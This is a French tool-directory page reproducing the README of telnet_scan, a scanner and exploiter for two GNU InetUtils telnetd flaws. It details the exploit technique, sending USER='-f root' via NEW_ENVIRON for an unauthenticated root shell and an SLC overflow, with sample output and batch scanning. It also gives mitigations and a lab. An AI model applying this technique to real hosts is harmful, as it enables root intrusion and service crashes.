Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
telnet_scan — scanner/exploiteur CVE-2026-24061 & CVE-2026-32746 | Kitploit
Outils/GitHubGitHub/ekomssavior/telnet_scan
Scanners de VulnérabilitésExploitationSécurité RéseauTests d'IntrusionAuthentificationApprentissage et ÉducationExploitation de BinairesLabs et Pratique
GitHubekomssavior/telnet_scan

telnet_scan

scanner/exploiteur CVE-2026-24061 & CVE-2026-32746

Voir le dépôt
1161il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Scanner de vulnérabilités Telnet (CVE-2026-24061 & CVE-2026-32746)

Licence:ek0ms

Un outil d'évaluation de sécurité basé sur Python qui détecte et (le cas échéant) exploite deux vulnérabilités critiques dans GNU InetUtils telnetd :

  • CVE-2026-24061 – Contournement d'authentification par injection de variable d'environnement USER (CVSS 9.8)
  • CVE-2026-32746 – Débordement de tampon avant authentification dans le gestionnaire SLC de LINEMODE (CVSS 9.8)

Avertissement important

Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives.
Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester est illégale. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil. Utilisez-le à vos risques et périls.

image1(1)

Fonctionnalités

  • Analyse d'une cible unique – Saisissez des adresses IP ou des noms de domaine à l'exécution
  • Analyse par lot – Téléchargez un fichier contenant plusieurs cibles (une par ligne)
  • – Testez chaque vulnérabilité individuellement ou les deux
Télécharger l’outil
Tests sélectifs
  • Exploitation de CVE-2026-24061 – Si vulnérable, l'outil vous ouvre un shell root interactif directement dans le même terminal
  • Détection de CVE-2026-32746 – Identifie les systèmes vulnérables via la détection de crash contrôlé
  • Gestion propre du terminal – Shell en mode brut avec restauration correcte à la sortie
  • Validation de connexion – Distingue les ports filtrés, les services hors ligne et les vulnérabilités réelles
  • Débogage verbeux – Définissez TELNET_SCAN_VERBOSE=1 pour voir chaque paquet IAC et le récit de l'exploit pas à pas
  • Environnement de laboratoire Docker – Cible vulnérable autonome pour des tests sûrs
  • Installation

    root@kitploit:~
    git clone https://github.com/ekomsSavior/telnet_scan.git
    cd telnet_scan
    chmod +x telnet_scanner.py
    

    Utilisation

    Exécution de base

    root@kitploit:~
    python3 telnet_scanner.py
    

    Laboratoire Docker (test sûr)

    Testez l'exploit contre une cible vulnérable connue sans risquer des systèmes réels :

    root@kitploit:~
    cd lab
    docker compose up -d
    cd ..
    python3 telnet_scanner.py
    # Cible : 127.0.0.1, Port : 2323
    

    Le laboratoire exécute un GNU InetUtils 2.5 telnetd vulnérable dans un conteneur isolé, lié uniquement à localhost. Aucune exposition réseau.

    Mode verbeux

    Déboguez la négociation Telnet et voyez exactement ce qui se passe sur le fil :

    root@kitploit:~
    TELNET_SCAN_VERBOSE=1 python3 telnet_scanner.py
    

    La sortie verbeuse montre :

    • Chaque commande IAC (DO/WILL/SB) envoyée et reçue
    • Les noms d'options Telnet décodés
    • Les vidages hexadécimaux des charges utiles pour les sous-négociations
    • Le déroulement de l'exploit étape par étape (négociation en 6 étapes)

    IMG_2498

    Flux de travail pour cible unique

    1. Choisissez l'option 1
    2. Entrez la cible (IP ou domaine, ex. 192.168.1.100 ou example.com)
    3. Spécifiez le port (par défaut 23 si laissé vide)
    4. Sélectionnez le type de test :
      • 1 – Les deux vulnérabilités
      • 2 – Uniquement CVE-2026-24061 (contournement d'authentification)
      • 3 – Uniquement CVE-2026-32746 (débordement de tampon)

    Flux de travail pour analyse par lot

    1. Créez un fichier avec les cibles (une par ligne) Exemple targets.txt :
      root@kitploit:~
      192.168.1.100
      192.168.1.101
      10.0.0.50
      example.com
      # Ceci est une ligne de commentaire - ignorée
      
    2. Choisissez l'option 2
    3. Entrez le nom du fichier
    4. Spécifiez le port (par défaut 23)
    5. Sélectionnez le type de test (1, 2 ou 3)
    6. Le scanner va :
      • Afficher la progression pour chaque cible
      • Montrer les résultats au fur et à mesure
      • Fournir un tableau récapitulatif à la fin

    Lorsqu'un shell est obtenu

    Si CVE-2026-24061 réussit :

    1. La vulnérabilité est détectée
    2. Un shell root interactif apparaît directement dans la même fenêtre de terminal
    3. Tapez des commandes et voyez la sortie immédiatement (ex. id, whoami, ls)
    4. Appuyez sur Ctrl+C pour quitter le shell et revenir au menu du scanner
    5. Pour les analyses par lot, il vous sera demandé si vous souhaitez interagir avec le shell ou continuer l'analyse

    Aucun terminal séparé ni étape supplémentaire requis.

    Comment ça fonctionne

    CVE-2026-24061 – Contournement d'authentification

    L'exploit suit une négociation Telnet précise en 6 étapes pour garantir la compatibilité avec le vrai GNU InetUtils telnetd :

    1. Attendre la négociation du serveur – Jusqu'à 15 secondes pour le DNS inverse et les options DO initiales
    2. Répondre WILL – Accuser réception de TTYPE, TSPEED, XDISPLOC, NEW_ENVIRON
    3. Attendre SB SEND – Requêtes de sous-négociation du serveur
    4. Envoyer la charge utile d'exploitation – Définir USER="-f root" via la sous-négociation NEW_ENVIRON
    5. Gérer les échanges restants – Répondre à DO/WILL pour SGA, ECHO, LINEMODE, NAWS
    6. Détecter le shell – Chercher l'invite # , root@ ou $

    Un thread de maintien en vie envoie IAC NOP toutes les 2 secondes pour empêcher ttloop() de telnetd de détecter la fin de fichier et d'appeler exit(1) avant que la charge utile ne soit traitée.

    Le telnetd vulnérable passe -f root à /usr/bin/login, contournant l'authentification et accordant un accès immédiat au shell root.

    CVE-2026-32746 – Détection de débordement de tampon

    • Négocie l'option LINEMODE (RFC 1184)
    • Envoie 500+ triplets SLC (1500+ octets) pour faire déborder le tampon de taille fixe
    • Surveille les réinitialisations/plantages de connexion pour confirmer la vulnérabilité

    Validation de connexion

    • Pré-analyse pour vérifier la disponibilité du service avant de tenter les exploits
    • Distingue entre :
      • Ports filtrés (pare-feu bloquant)
      • Services hors ligne (aucun service en cours)
      • Services vulnérables (exploit réussi)

    Exemple de sortie

    Cible unique

    root@kitploit:~
    === Scanner de vulnérabilités Telnet ===
    1. Analyser une seule cible
    2. Analyser des cibles à partir d'un fichier (une IP/nom d'hôte par ligne)
    3. Quitter
    
    Choisissez une option : 1
    Port (par défaut 23) :
    
    Quels tests exécuter ?
    1. Les deux
    2. Uniquement CVE-2026-24061 (contournement d'auth - donne un shell si vulnérable)
    3. Uniquement CVE-2026-32746 (détection de débordement de tampon)
    Choix [1-3] : 1
    Cible (IP ou domaine) : 192.168.1.100
    
    [*] Résolution de 192.168.1.100 -> 192.168.1.100
    [*] Analyse de 192.168.1.100:23...
    
    [*] Vérification de l'accessibilité du service...
    [+] Service accessible
    
    [*] Test de CVE-2026-24061 (contournement d'authentification)...
    [!] CVE-2026-24061 : VULNÉRABLE – shell obtenu !
    
    ============================================================
    [+] SHELL ROOT OBTENU ! Vous êtes maintenant dans un shell root interactif.
    [+] Saisissez directement les commandes ici. Appuyez sur Ctrl+C pour quitter le shell.
    ============================================================
    
    id
    uid=0(root) gid=0(root) groups=0(root)
    

    Sortie en mode verbeux (partielle)

    root@kitploit:~
        [ÉTAPE 1/6] Attente de la négociation du serveur (peut prendre jusqu'à 15s)...
        [ÉTAPE 1/6] 48 octets reçus : fffb18fffb20fffb23fffb27...
               décodé : IAC DO TERMINAL-TYPE
               décodé : IAC DO TERMINAL-SPEED  
               décodé : IAC DO X-DISPLAY-LOCATION
               décodé : IAC DO NEW-ENVIRON
        [ÉTAPE 2/6] Réponse WILL à toutes les options DO
        [ÉTAPE 3/6] Attente des requêtes de sous-négociation SB SEND...
        [ÉTAPE 4/6] Envoi des réponses de sous-négociation...
                   NEW-ENVIRON IS VAR USER VALUE "-f root"  *** EXPLOIT ***
        [ÉTAPE 5/6] Gestion des négociations d'options restantes...
        [ÉTAPE 5/6] Texte reçu : 'root@vuln-lab:~# '
        [RÉSULTAT] SUCCÈS : Connexion root sans mot de passe via injection USER="-f root"
    

    Analyse par lot

    root@kitploit:~
    === Scanner de vulnérabilités Telnet ===
    1. Analyser une seule cible
    2. Analyser des cibles à partir d'un fichier (une IP/nom d'hôte par ligne)
    3. Quitter
    
    Choisissez une option : 2
    Port (par défaut 23) :
    Entrez le nom du fichier avec les cibles (une par ligne) : targets.txt
    
    Quels tests exécuter ?
    1. Les deux
    2. Uniquement CVE-2026-24061 (contournement d'auth - donne un shell si vulnérable)
    3. Uniquement CVE-2026-32746 (détection de débordement de tampon)
    Choix [1-3] : 1
    
    [*] 3 cibles chargées depuis targets.txt
    
    ==================================================
    [1/3] Analyse de 192.168.1.100:23
    ==================================================
    [*] Résolution de 192.168.1.100 -> 192.168.1.100
    [+] Service accessible
    
    [*] Test de CVE-2026-24061...
    [!] CVE-2026-24061 : VULNÉRABLE – shell obtenu !
    
    [?] Shell obtenu ! Interagir maintenant ? (o/N) : n
    
    [*] Test de CVE-2026-32746...
    [+] Le serveur n'a pas planté ; probablement non vulnérable
    
    ==================================================
    [2/3] Analyse de 192.168.1.101:23
    ==================================================
    [-] Service inaccessible sur 192.168.1.101:23
    
    ==================================================
    [3/3] Analyse de example.com:23
    ==================================================
    [*] Résolution de example.com -> 93.184.216.34
    [+] Service accessible
    
    [*] Test de CVE-2026-24061...
    [+] Aucune réponse reçue ; pourrait encore être vulnérable
    
    [*] Test de CVE-2026-32746...
    [!] CVE-2026-32746 : VULNÉRABLE (serveur planté)
    
    ============================================================
    RÉSUMÉ DE L'ANALYSE
    ============================================================
    192.168.1.100 : VULNÉRABLE à CVE-2026-24061
    192.168.1.101 : Service inaccessible
    example.com : VULNÉRABLE à CVE-2026-32746
    ============================================================
    

    Atténuation

    Si vous découvrez des systèmes vulnérables, appliquez ces correctifs :

    1. Mettez à niveau GNU InetUtils vers la version 2.8 ou ultérieure
    2. Désactivez telnetd et bloquez TCP/23 aux limites du réseau
    3. Restreignez l'accès aux réseaux de confiance uniquement
    4. Surveillez les journaux pour les connexions avec des valeurs NEW_ENVIRON USER commençant par -f

    Développement et tests

    Laboratoire Docker

    Le répertoire lab/ fourni offre un environnement de test sûr et reproductible :

    root@kitploit:~
    cd lab
    docker compose up -d
    # Attendez environ 10 secondes que telnetd s'initialise
    python3 ../telnet_scanner.py
    # Cible : 127.0.0.1, Port : 2323
    

    Caractéristiques du laboratoire :

    • GNU InetUtils 2.5 compilé à partir des sources (versions vulnérables)
    • Exécute telnetd dans un conteneur isolé
    • Lié uniquement à localhost:2323 – sûr pour le développement
    • Inclut un utilisateur de test (labuser:labpass123) pour le débogage

    Arrêtez le laboratoire une fois terminé :

    root@kitploit:~
    cd lab && docker compose down
    

    Limitations connues

    • Le test de débordement (CVE-2026-32746) peut faire planter le service telnetd cible
    • Les touches fléchées et le redimensionnement du terminal ne sont pas entièrement pris en charge dans le shell interactif
    • Certains pare-feu ou configurations réseau peuvent interférer avec la négociation d'options Telnet
    • Utilisateurs Windows : le shell interactif nécessite un terminal de type Unix (WSL, Cygwin, ou Linux/macOS)

    image0(2)

    Remerciements

    Remerciements spéciaux à @leetcrypt – La négociation en 6 étapes appropriée, le thread de maintien en vie, le mode verbeux et le laboratoire Docker déchirent !


    AVERTISSEMENT : destiné uniquement aux tests de sécurité autorisés et à des fins éducatives.